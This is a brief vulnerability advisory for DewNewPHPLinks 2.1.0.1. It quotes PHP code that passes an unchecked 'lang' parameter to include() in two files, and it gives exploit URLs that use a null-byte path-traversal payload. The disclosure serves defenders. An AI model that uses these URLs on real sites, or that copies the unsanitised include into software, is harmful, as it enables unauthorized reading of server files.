DewNewPHPLinks version 2.1.0.1 suffers from a local file inclusion vulnerability.
60520ce8dda32ae286f8673329818e13636dcb0be18f10b31afb8548143833c5
#########################local file include#################
Author: ItSecTeam
download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip
script:DewNewPHPLinks 2.1.0.1
*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
--------------------------------------------
xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################
discovered by ahmadbady
########################